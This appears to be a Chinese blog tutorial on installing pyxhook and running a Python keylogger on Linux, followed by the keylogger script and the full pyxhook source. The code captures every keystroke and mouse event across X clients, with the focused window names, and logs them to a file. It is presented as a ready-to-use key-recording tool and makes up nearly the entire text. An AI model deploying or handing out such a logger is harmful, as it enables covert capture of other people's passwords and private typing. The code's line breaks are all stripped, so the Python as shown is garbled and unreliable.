

sudo python setup.py install进行安装



我们进入linux目录,运行python keylogger.py  就可以记录按键值,修改keylogger.py中的log_file路径制定我们要保存的按键值的文件路径.按grave键来退出程序,也就是ESC下面的那个键.


import pyxhook#This tells the keylogger where the log will go. Change it to direct to where you want it.log_file='/home/linux/file.log'#The file will automatically appear on the desktop. You may want to edit the location!def OnKeyPress(event):fob=open(log_file,'a')fob.write(event.Key)fob.write('\n')if event.Ascii==96: fob.close()new_hook.cancel()new_hook=pyxhook.HookManager()new_hook.KeyDown=OnKeyPressnew_hook.HookKeyboard()new_hook.start()


#!/usr/bin/pythonimport sysimport osimport reimport timeimport threadingfrom Xlib import X, XK, display, errorfrom Xlib.ext import recordfrom Xlib.protocol import rqclass HookManager(threading.Thread):"""This is the main class. Instantiate it, and you can hand it KeyDown and KeyUp (functions in your own code) which execute to parse the pyxhookkeyevent class that is returned.This simply takes these two values for now:KeyDown = The function to execute when a key is pressed, if it returns anything. It hands the function an argument that is the pyxhookkeyevent class.KeyUp = The function to execute when a key is released, if it returns anything. It hands the function an argument that is the pyxhookkeyevent class."""def __init__(self):threading.Thread.__init__(self)self.finished = threading.Event()# Give these some initial valuesself.mouse_position_x = 0self.mouse_position_y = 0self.ison = {"shift":False, "caps":False}# Compile our regex statements.self.isshift = re.compile('^Shift')self.iscaps = re.compile('^Caps_Lock')self.shiftablechar = re.compile('^[a-z0-9]$|^minus$|^equal$|^bracketleft$|^bracketright$|^semicolon$|^backslash$|^apostrophe$|^comma$|^period$|^slash$|^grave$')self.logrelease = re.compile('.*')self.isspace = re.compile('^space$')# Assign default function actions (do nothing).self.KeyDown = lambda x: Trueself.KeyUp = lambda x: Trueself.MouseAllButtonsDown = lambda x: Trueself.MouseAllButtonsUp = lambda x: Trueself.contextEventMask = [X.KeyPress,X.MotionNotify]# Hook to our display.self.local_dpy = display.Display()self.record_dpy = display.Display()def run(self):# Check if the extension is presentif not self.record_dpy.has_extension("RECORD"):print "RECORD extension not found"sys.exit(1)r = self.record_dpy.record_get_version(0, 0)print "RECORD extension version %d.%d" % (r.major_version, r.minor_version)# Create a recording context; we only want key and mouse eventsself.ctx = self.record_dpy.record_create_context(0,[record.AllClients],[{'core_requests': (0, 0),'core_replies': (0, 0),'ext_requests': (0, 0, 0, 0),'ext_replies': (0, 0, 0, 0),'delivered_events': (0, 0),'device_events': tuple(self.contextEventMask), #(X.KeyPress, X.ButtonPress),'errors': (0, 0),'client_started': False,'client_died': False,}])# Enable the context; this only returns after a call to record_disable_context,# while calling the callback function in the meantimeself.record_dpy.record_enable_context(self.ctx, self.processevents)# Finally free the contextself.record_dpy.record_free_context(self.ctx)def cancel(self):self.finished.set()self.local_dpy.record_disable_context(self.ctx)self.local_dpy.flush()def printevent(self, event):print eventdef HookKeyboard(self):pass# We don't need to do anything here anymore, since the default mask # is now set to contain X.KeyPress#self.contextEventMask[0] = X.KeyPressdef HookMouse(self):pass# We don't need to do anything here anymore, since the default mask # is now set to contain X.MotionNotify# need mouse motion to track pointer position, since ButtonPress events# don't carry that info.#self.contextEventMask[1] = X.MotionNotifydef processevents(self, reply):if reply.category != record.FromServer:returnif reply.client_swapped:print "* received swapped protocol data, cowardly ignored"returnif not len(reply.data) or ord(reply.data[0]) < 2:# not an eventreturndata = reply.datawhile len(data):event, data = rq.EventField(None).parse_binary_value(data, self.record_dpy.display, None, None)if event.type == X.KeyPress:hookevent = self.keypressevent(event)self.KeyDown(hookevent)elif event.type == X.KeyRelease:hookevent = self.keyreleaseevent(event)self.KeyUp(hookevent)elif event.type == X.ButtonPress:hookevent = self.buttonpressevent(event)self.MouseAllButtonsDown(hookevent)elif event.type == X.ButtonRelease:hookevent = self.buttonreleaseevent(event)self.MouseAllButtonsUp(hookevent)elif event.type == X.MotionNotify:# use mouse moves to record mouse position, since press and release events# do not give mouse position info (event.root_x and event.root_y have # bogus info).self.mousemoveevent(event)#print "processing events...", event.typedef keypressevent(self, event):matchto = self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))if self.shiftablechar.match(self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))): ## This is a character that can be typed.if self.ison["shift"] == False:keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)return self.makekeyhookevent(keysym, event)else:keysym = self.local_dpy.keycode_to_keysym(event.detail, 1)return self.makekeyhookevent(keysym, event)else: ## Not a typable character.keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)if self.isshift.match(matchto):self.ison["shift"] = self.ison["shift"] + 1elif self.iscaps.match(matchto):if self.ison["caps"] == False:self.ison["shift"] = self.ison["shift"] + 1self.ison["caps"] = Trueif self.ison["caps"] == True:self.ison["shift"] = self.ison["shift"] - 1self.ison["caps"] = Falsereturn self.makekeyhookevent(keysym, event)def keyreleaseevent(self, event):if self.shiftablechar.match(self.lookup_keysym(self.local_dpy.keycode_to_keysym(event.detail, 0))):if self.ison["shift"] == False:keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)else:keysym = self.local_dpy.keycode_to_keysym(event.detail, 1)else:keysym = self.local_dpy.keycode_to_keysym(event.detail, 0)matchto = self.lookup_keysym(keysym)if self.isshift.match(matchto):self.ison["shift"] = self.ison["shift"] - 1return self.makekeyhookevent(keysym, event)def buttonpressevent(self, event):#self.clickx = self.rootx#self.clicky = self.rootyreturn self.makemousehookevent(event)def buttonreleaseevent(self, event):#if (self.clickx == self.rootx) and (self.clicky == self.rooty):##print "ButtonClick " + str(event.detail) + " x=" + str(self.rootx) + " y=" + str(self.rooty)#if (event.detail == 1) or (event.detail == 2) or (event.detail == 3):#self.captureclick()#else:#passreturn self.makemousehookevent(event)#    sys.stdout.write("ButtonDown " + str(event.detail) + " x=" + str(self.clickx) + " y=" + str(self.clicky) + "\n")#    sys.stdout.write("ButtonUp " + str(event.detail) + " x=" + str(self.rootx) + " y=" + str(self.rooty) + "\n")#sys.stdout.flush()def mousemoveevent(self, event):self.mouse_position_x = event.root_xself.mouse_position_y = event.root_y# need the following because XK.keysym_to_string() only does printable chars# rather than being the correct inverse of XK.string_to_keysym()def lookup_keysym(self, keysym):for name in dir(XK):if name.startswith("XK_") and getattr(XK, name) == keysym:return name.lstrip("XK_")return "[%d]" % keysymdef asciivalue(self, keysym):asciinum = XK.string_to_keysym(self.lookup_keysym(keysym))if asciinum < 256:return asciinumelse:return 0def makekeyhookevent(self, keysym, event):storewm = self.xwindowinfo()if event.type == X.KeyPress:MessageName = "key down"elif event.type == X.KeyRelease:MessageName = "key up"return pyxhookkeyevent(storewm["handle"], storewm["name"], storewm["class"], self.lookup_keysym(keysym), self.asciivalue(keysym), False, event.detail, MessageName)def makemousehookevent(self, event):storewm = self.xwindowinfo()if event.detail == 1:MessageName = "mouse left "elif event.detail == 3:MessageName = "mouse right "elif event.detail == 2:MessageName = "mouse middle "elif event.detail == 5:MessageName = "mouse wheel down "elif event.detail == 4:MessageName = "mouse wheel up "else:MessageName = "mouse " + str(event.detail) + " "if event.type == X.ButtonPress:MessageName = MessageName + "down"elif event.type == X.ButtonRelease:MessageName = MessageName + "up"return pyxhookmouseevent(storewm["handle"], storewm["name"], storewm["class"], (self.mouse_position_x, self.mouse_position_y), MessageName)def xwindowinfo(self):try:windowvar = self.local_dpy.get_input_focus().focuswmname = windowvar.get_wm_name()wmclass = windowvar.get_wm_class()wmhandle = str(windowvar)[20:30]except:## This is to keep things running smoothly. It almost never happens, but still...return {"name":None, "class":None, "handle":None}if (wmname == None) and (wmclass == None):try:windowvar = windowvar.query_tree().parentwmname = windowvar.get_wm_name()wmclass = windowvar.get_wm_class()wmhandle = str(windowvar)[20:30]except:## This is to keep things running smoothly. It almost never happens, but still...return {"name":None, "class":None, "handle":None}if wmclass == None:return {"name":wmname, "class":wmclass, "handle":wmhandle}else:return {"name":wmname, "class":wmclass[0], "handle":wmhandle}class pyxhookkeyevent:"""This is the class that is returned with each key event.fIt simply creates the variables below in the class.Window = The handle of the window.WindowName = The name of the window.WindowProcName = The backend process for the window.Key = The key pressed, shifted to the correct caps value.Ascii = An ascii representation of the key. It returns 0 if the ascii value is not between 31 and 256.KeyID = This is just False for now. Under windows, it is the Virtual Key Code, but that's a windows-only thing.ScanCode = Please don't use this. It differs for pretty much every type of keyboard. X11 abstracts this information anyway.MessageName = "key down", "key up"."""def __init__(self, Window, WindowName, WindowProcName, Key, Ascii, KeyID, ScanCode, MessageName):self.Window = Windowself.WindowName = WindowNameself.WindowProcName = WindowProcNameself.Key = Keyself.Ascii = Asciiself.KeyID = KeyIDself.ScanCode = ScanCodeself.MessageName = MessageNamedef __str__(self):return "Window Handle: " + str(self.Window) + "\nWindow Name: " + str(self.WindowName) + "\nWindow's Process Name: " + str(self.WindowProcName) + "\nKey Pressed: " + str(self.Key) + "\nAscii Value: " + str(self.Ascii) + "\nKeyID: " + str(self.KeyID) + "\nScanCode: " + str(self.ScanCode) + "\nMessageName: " + str(self.MessageName) + "\n"class pyxhookmouseevent:"""This is the class that is returned with each key event.fIt simply creates the variables below in the class.Window = The handle of the window.WindowName = The name of the window.WindowProcName = The backend process for the window.Position = 2-tuple (x,y) coordinates of the mouse clickMessageName = "mouse left|right|middle down", "mouse left|right|middle up"."""def __init__(self, Window, WindowName, WindowProcName, Position, MessageName):self.Window = Windowself.WindowName = WindowNameself.WindowProcName = WindowProcNameself.Position = Positionself.MessageName = MessageNamedef __str__(self):return "Window Handle: " + str(self.Window) + "\nWindow Name: " + str(self.WindowName) + "\nWindow's Process Name: " + str(self.WindowProcName) + "\nPosition: " + str(self.Position) + "\nMessageName: " + str(self.MessageName) + "\n"################################################################################################END CLASS DEF########################################################################################################if __name__ == '__main__':hm = HookManager()hm.HookKeyboard()hm.HookMouse()hm.KeyDown = hm.printeventhm.KeyUp = hm.printeventhm.MouseAllButtonsDown = hm.printeventhm.MouseAllButtonsUp = hm.printeventhm.start()time.sleep(10)hm.cancel()


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